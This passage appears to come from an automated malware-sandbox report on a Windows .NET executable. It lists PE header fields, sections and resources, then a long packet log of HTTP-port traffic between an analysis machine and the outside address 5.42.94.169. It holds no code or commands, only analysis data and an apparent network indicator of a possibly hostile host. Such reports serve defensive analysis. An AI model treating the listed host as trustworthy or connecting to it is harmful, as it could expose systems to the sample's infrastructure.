                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x647D784C [Mon Jun 5 05:53:16 2023 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:
                                                        Instruction
                                                        dec ebp
                                                        pop edx
                                                        nop
                                                        add byte ptr [ebx], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax+eax], al
                                                        add byte ptr [eax], al
                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xa0000x8f4.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x8ad80x1c.text
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x20000x6b550x6c00False0.5057146990740741data5.791232238044552IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rsrc0xa0000x8f40xa00False0.2921875data4.376579543169947IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        NameRVASizeTypeLanguageCountry
                                                        RT_VERSION0xa0b80x328data
                                                        RT_VERSION0xa3e00x328dataEnglishUnited States
                                                        RT_MANIFEST0xa7080x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                        Language of compilation systemCountry where language is spokenMap
                                                        EnglishUnited States
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Jun 6, 2023 17:14:51.786187887 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:51.835110903 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:51.835464001 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:51.860167980 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:51.911331892 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:51.911371946 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:51.911385059 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:51.911403894 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:51.911417961 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:51.911432028 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:51.911446095 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:51.911465883 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:51.911478996 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:51.911498070 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:51.911545992 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:51.911638021 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:51.960335970 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:51.960397005 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:51.960416079 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:51.960436106 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:51.960455894 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:51.960474014 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:51.960494041 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:51.960513115 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:51.960531950 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:51.960550070 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:51.960567951 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:51.960586071 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:51.960602999 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:51.960619926 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:51.960633993 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:51.960639000 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:51.960656881 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:51.960675001 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:51.960676908 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:51.960692883 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:51.960701942 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:51.960711002 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:51.960728884 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:51.960736990 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:51.960772038 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.009464979 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.009502888 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.009522915 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.009541035 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.009560108 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.009574890 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.009582043 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.009602070 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.009619951 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.009625912 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.009648085 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.009649992 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.009670973 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.009673119 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.009691954 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.009711027 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.009721994 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.009732962 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.009752989 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.009766102 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.009774923 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.009789944 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.009798050 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.009819984 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.009838104 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.009859085 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.009860039 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.009879112 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.009897947 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.009902954 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.009924889 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.009946108 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.009948969 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.009964943 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.009972095 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.009987116 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.010001898 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.010008097 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.010026932 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.010050058 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.010062933 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.010071039 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.010092974 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.010097980 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.010113955 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.010133028 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.010142088 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.010154963 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.010174990 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.010181904 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.010196924 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.010215998 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.010221958 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.010241985 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.010260105 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.010277033 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.010282993 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.010303020 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.010312080 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.010354042 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.059163094 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.059200048 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.059220076 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.059251070 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.059283018 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.059295893 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.059314966 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.059334040 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.059343100 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.059355974 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.059376955 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.059379101 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.059397936 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.059412956 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.059420109 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.059434891 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.059442043 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.059461117 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.059480906 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.059489965 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.059501886 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.059523106 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.059524059 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.059542894 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.059561968 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.059577942 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.059585094 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.059603930 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.059611082 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.059623957 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.059644938 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.059647083 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.059664965 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.059684038 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.059705973 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.059711933 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.059730053 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.059755087 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.059779882 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.059783936 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.059783936 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.059802055 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.059818029 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.059825897 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.059844971 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.059865952 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.059865952 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.059885025 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.059904099 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.059906960 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.059926033 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.059942007 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.059947968 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.059967995 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.059983969 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.059990883 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.060017109 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.060030937 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.060055017 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.060071945 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.060091972 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.060095072 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.060115099 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.060137987 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.060148954 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.060161114 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.060180902 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.060184956 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.060199976 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.060219049 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.060235023 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.060241938 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.060260057 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.060282946 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.060319901 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.109149933 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.109183073 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.109203100 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.109221935 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.109240055 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.109260082 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.109278917 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.109297991 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.109316111 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.109328985 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.109348059 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.109369040 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.109391928 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.109416008 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.109435081 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.109452009 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.109469891 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.109488010 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.109505892 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.109524012 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.109543085 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.109560966 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.109580040 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.109597921 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.109616041 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.109632969 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.109652042 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.109671116 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.109688997 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.109708071 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.109724998 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.109743118 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.109761000 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.109780073 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.109798908 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.109819889 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.109838009 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.109858036 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.109877110 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.109895945 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.109915018 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.109934092 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.109951019 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.109971046 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.109989882 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.110008001 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.110027075 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.110044956 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.110063076 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.110080957 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.126450062 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.175585985 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.175633907 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.175659895 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.175685883 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.175709963 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.175736904 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.175764084 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.175786972 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.175810099 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.175812006 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.175836086 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.175837040 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.175858021 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.175879002 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.175882101 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.175901890 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.175920963 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.175939083 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.175941944 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.175956011 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.175975084 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.175976992 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.175993919 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.175998926 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.176017046 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.176034927 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.176034927 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.176055908 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.176069975 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.176074982 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.176095009 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.176116943 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.176119089 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.176139116 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.176156998 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.176157951 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.176179886 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.176193953 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.176202059 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.176227093 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.176233053 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.176244974 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.176282883 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.176306009 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.176310062 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.176331997 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.176352024 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.176353931 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.176377058 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.176390886 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.176395893 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.176414967 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.176434040 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.176450014 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.176451921 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.176470995 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.176481009 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.176489115 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.176506996 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.176516056 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.176526070 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.176543951 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.176553011 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.176563025 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.176577091 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.176580906 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.176599026 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.176618099 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.176625013 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.176636934 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.176656961 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.176661968 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.176690102 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.225749969 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.225791931 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.225816011 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.225845098 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.225867987 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.225886106 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.225907087 CEST80497085.42.94.169192.168.2.6
